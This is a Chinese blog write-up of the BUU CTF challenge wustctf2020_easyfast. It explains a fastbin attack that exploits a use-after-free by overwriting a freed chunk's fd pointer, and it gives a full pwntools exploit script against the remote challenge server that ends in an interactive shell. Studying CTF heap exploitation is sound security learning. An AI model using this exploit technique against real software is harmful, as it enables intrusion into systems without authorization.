BUU-wustctf2020_easyfast-WP

2021 年 01 月 27 日

1185 次浏览

1343字数

fastbin attack水题，大概是`House Of Spirit`

存在UAF,所以也不需要double free了，申请两个chunk，free掉他们，由于fastbin的LIFO策略，修改第二个chunk的fd指针为0x602080，然后malloc两次就可以对0x602090任意写。当然由于fastbin在分配时会检测被分配的chunk的`size`的正确性

```
if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
    {
      errstr = "malloc(): memory corruption (fast)";
    errout:
      malloc_printerr (check_action, errstr, chunk2mem (victim));
      return NULL;
}
```

而0x602088处已有p64(0x50)，所以我们分配的chunk大小需要为0x40

### exp

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level ="debug")

#sh = process("./wustctf2020_easyfast")
sh = remote("node3.buuoj.cn",26003)

sh.sendlineafter("choice>\n","1")
sh.sendlineafter("size>\n","64")

sh.sendlineafter("choice>\n","2")
sh.sendlineafter("index>\n","0")

sh.sendlineafter("choice>\n","2")
sh.sendlineafter("index>\n","1")

sh.sendlineafter("choice>\n","3")
sh.sendlineafter("index>\n","1")
sh.send(p64(0x602080))

sh.sendlineafter("choice>\n","1")
sh.sendlineafter("size>\n","64")

sh.sendlineafter("choice>\n","3")
sh.sendlineafter("index>\n","3")
sh.send(p64(0))

sh.sendlineafter("choice>\n","4")
sh.interactive()
```

最后修改：2021 年 02 月 05 日

如果觉得我的文章对你有用,那听听上面我喜欢的歌吧

BUU-wustctf2020_easyfast-WP

发表评论取消回复

RCTF2021-musl-WP && 5space 2021 *CTF 2022 强网杯 2022 Musl 赛题 exp

写在大一结束

HGAME2021-WEAK1-WP

XCTF/BUU-babyfengshui-WP

BUU-360chunqiu2017_smallest-WP

BUU-actf_2019_onerepeater-WP

BUU&XCTF-hitcontraining_uaf-WP

CISCN2021-silverwolf-WP

HGAME-WEEK3-WP

unsorted bin 利用的简单总结

BUU-wustctf2020_easyfast-WP

发表评论 取消回复

BUU-wustctf2020_easyfast-WP

发表评论取消回复